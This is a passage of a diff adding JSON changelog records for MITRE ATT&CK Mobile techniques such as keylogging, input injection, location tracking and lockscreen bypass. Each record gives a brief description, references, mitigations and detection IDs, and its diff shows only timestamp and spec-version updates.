+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2025-10-24 17:48:45.045000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1012: Enterprise Policy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0676: Detection of GUI Input Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-05 19:45:03+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Keylogging",
+                    "description": "Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.\n\nSome methods of keylogging include:\n\n* Masquerading as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.\n* Abusing accessibility features. On Android, adversaries may abuse accessibility features to record keystrokes by registering an `AccessibilityService` class, overriding the `onAccessibilityEvent` method, and listening for the `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed into the function will contain the data that the user typed. \n*Additional methods of keylogging may be possible if root access is available. \n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1417/001",
+                            "external_id": "T1417.001"
+                        },
+                        {
+                            "source_name": "Zeltser-Keyboard",
+                            "description": "Lenny Zeltser. (2016, July 30). Security of Third-Party Keyboard Apps on Mobile Devices. Retrieved December 21, 2016.",
+                            "url": "https://zeltser.com/third-party-keyboards-security/"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html",
+                            "external_id": "AUT-13"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-10-24 17:49:14.276000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance",
+                            "M1012: Enterprise Policy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0661: Detection of Keylogging"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-09-15 15:26:22.356000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Input Injection",
+                    "description": "A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.\n\n[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:\n\n* Mimicking user clicks on the screen, for example to steal money from a user's PayPal account.(Citation: android-trojan-steals-paypal-2fa)\n* Injecting global actions, such as `GLOBAL_ACTION_BACK` (programatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)\n* Inserting input into text fields on behalf of the user. This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1516",
+                            "external_id": "T1516"
+                        },
+                        {
+                            "source_name": "bitwarden autofill logins",
+                            "description": "Bitwarden. (n.d.).  Auto-fill logins on Android . Retrieved September 15, 2019.",
+                            "url": "https://help.bitwarden.com/article/auto-fill-android/"
+                        },
+                        {
+                            "source_name": "android-trojan-steals-paypal-2fa",
+                            "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.",
+                            "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/"
+                        },
+                        {
+                            "source_name": "Talos Gustuff Apr 2019",
+                            "description": "Vitor Ventura. (2019, April 9).  Gustuff banking botnet targets Australia . Retrieved September 3, 2019.",
+                            "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Luk\u00e1\u0161 \u0160tefanko, ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:25.635000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance",
+                            "M1012: Enterprise Policy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0612: Detection of Input Injection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:12.267000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Location Tracking",
+                    "description": "Adversaries may track a device\u2019s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device. \n\n \n\nOn Android, applications holding the `ACCESS_COAURSE_LOCATION` or `ACCESS_FINE_LOCATION` permissions provide access to the device\u2019s physical location. On Android 10 and up, declaration of the `ACCESS_BACKGROUND_LOCATION` permission in an application\u2019s manifest will allow applications to request location access even when the application is running in the background.(Citation: Android Request Location Permissions) Some adversaries have utilized integration of Baidu map services to retrieve geographical location once the location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo Alto HenBox) \n\n \n\nOn iOS, applications must include the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file depending on the extent of requested access to location information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and up, applications call `requestWhenInUseAuthorization()` to request access to location information when the application is in use or `requestAlwaysAuthorization()` to request access to location information regardless of whether the application is in use. With elevated privileges, an adversary may be able to access location data without explicit user consent with the `com.apple.locationd.preauthorized` entitlement key.(Citation: Google Project Zero Insomnia)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1430",
+                            "external_id": "T1430"
+                        },
+                        {
+                            "source_name": "Palo Alto HenBox",
+                            "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/"
+                        },
+                        {
+                            "source_name": "Android Request Location Permissions",
+                            "description": "Android Developers. (2022, March 24). Request Location Permissions. Retrieved April 1, 2022.",
+                            "url": "https://developer.android.com/training/location/permissions"
+                        },
+                        {
+                            "source_name": "Apple Requesting Authorization for Location Services",
+                            "description": "Apple Developers. (n.d.). Requesting Authorization for Location Services. Retrieved April 1, 2022.",
+                            "url": "https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services"
+                        },
+                        {
+                            "source_name": "Google Project Zero Insomnia",
+                            "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.",
+                            "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html"
+                        },
+                        {
+                            "source_name": "PaloAlto-SpyDealer",
+                            "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html",
+                            "external_id": "APP-24"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:08.214000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version",
+                            "M1011: User Guidance",
+                            "M1012: Enterprise Policy",
+                            "M1014: Interconnection Filtering"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0675: Detection of Location Tracking"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:24.488000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Lockscreen Bypass",
+                    "description": "An adversary with physical access to a mobile device may seek to bypass the device\u2019s lockscreen. Several methods exist to accomplish this, including:\n\n* Biometric spoofing: If biometric authentication is used, an adversary could attempt to spoof a mobile device\u2019s biometric authentication mechanism. Both iOS and Android partly mitigate this attack by requiring the device\u2019s passcode rather than biometrics to unlock the device after every device restart, and after a set or random amount of time.(Citation: SRLabs-Fingerprint)(Citation: TheSun-FaceID)\n* Unlock code bypass: An adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (\u201cshoulder surfing\u201d) the device owner\u2019s use of the lockscreen passcode. Mobile OS vendors partly mitigate this by implementing incremental backoff timers after a set number of failed unlock attempts, as well as a configurable full device wipe after several failed unlock attempts.\n* Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile devices to bypass the lockscreen. The vulnerabilities are generally patched by the device or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kaspersky-iOSBypass)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1461",
+                            "external_id": "T1461"
+                        },
+                        {
+                            "source_name": "Wired-AndroidBypass",
+                            "description": "Andy Greenberg. (2015, September 15). Hack Brief: Emergency Number Hack Bypasses Android Lock Screens. Retrieved December 23, 2016.",
+                            "url": "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/"
+                        },
+                        {
+                            "source_name": "Kaspersky-iOSBypass",
+                            "description": "Chris Brook. (2016, November 17). iOS 10 Passcode Bypass Can Access Photos, Contacts. Retrieved December 23, 2016.",
+                            "url": "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/"
+                        },
+                        {
+                            "source_name": "TheSun-FaceID",
+                            "description": "Sean Keach. (2018, February 15). Brit mates BREAK Apple\u2019s face unlock and vow to never buy iPhone again. Retrieved September 18, 2018.",
+                            "url": "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/"
+                        },
+                        {
+                            "source_name": "SRLabs-Fingerprint",
+                            "description": "SRLabs. (n.d.). Fingerprints are not fit for secure device unlocking. Retrieved December 23, 2016.",
+                            "url": "https://srlabs.de/bites/spoofing-fingerprints/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:29.764000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1001: Security Updates",
+                            "M1012: Enterprise Policy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0645: Detection of Lockscreen Bypass"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f856eaab-e84a-4265-a8a2-7bf37e5dc2fc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-07-12 20:29:48.758000+00:00",
+                    "modified": "2026-05-12 15:12:00.725000+00:00",
+                    "name": "Masquerading",
+                    "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name, location, or appearance of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1655)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1655",
+                            "external_id": "T1655"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html",
+                            "external_id": "APP-14"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html",
+                            "external_id": "APP-31"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.725000+00:00\", \"old_value\": \"2025-10-24 17:49:38.098000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0715: Detection of Masquerading"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--114fed8b-7eed-4136-8b9c-411c5c7fff4b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-07-12 20:45:14.704000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Match Legitimate Name or Location",
+                    "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., `com.google.android.gm`). \n\nAdversaries may also use the same icon of the file or application they are trying to mimic.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1655/001",
+                            "external_id": "T1655.001"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html",
+                            "external_id": "APP-14"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html",
+                            "external_id": "APP-31"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ford Qin, Trend Micro",
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2025-04-16 21:21:44.590000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1011: User Guidance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0609: Detection of Match Legitimate Name or Location"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-04-28 14:35:37.309000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Native API",
+                    "description": "Adversaries may use Android\u2019s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.\n\nThe NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)\n\nAdversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        },
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1575",
+                            "external_id": "T1575"
+                        },
+                        {
+                            "source_name": "Google NDK Getting Started",
+                            "description": "Google. (2019, December 27). Getting Started with the NDK. Retrieved April 28, 2020.",
+                            "url": "https://developer.android.com/ndk/guides"
+                        },
+                        {
+                            "source_name": "MITRE App Vetting Effectiveness",
+                            "description": "M. Peck, C. Northern. (2016, August 22). Analyzing the Effectiveness of App Vetting Tools in the Enterprise. Retrieved April 28, 2020.",
+                            "url": "https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2025-10-24 17:48:47.482000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0717: Detection of Native API"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:32.328000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Obfuscated Files or Information",
+                    "description": "Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n \nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1406",
+                            "external_id": "T1406"
+                        },
+                        {
+                            "source_name": "Microsoft MalLockerB",
+                            "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.",
+                            "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html",
+                            "external_id": "APP-21"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "3.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:25.462000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0720: Detection of Obfuscated Files or Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-03-30 19:20:37.864000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "Software Packing",
+                    "description": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. \n\nUtilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "defense-evasion"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1406/002",
+                            "external_id": "T1406.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
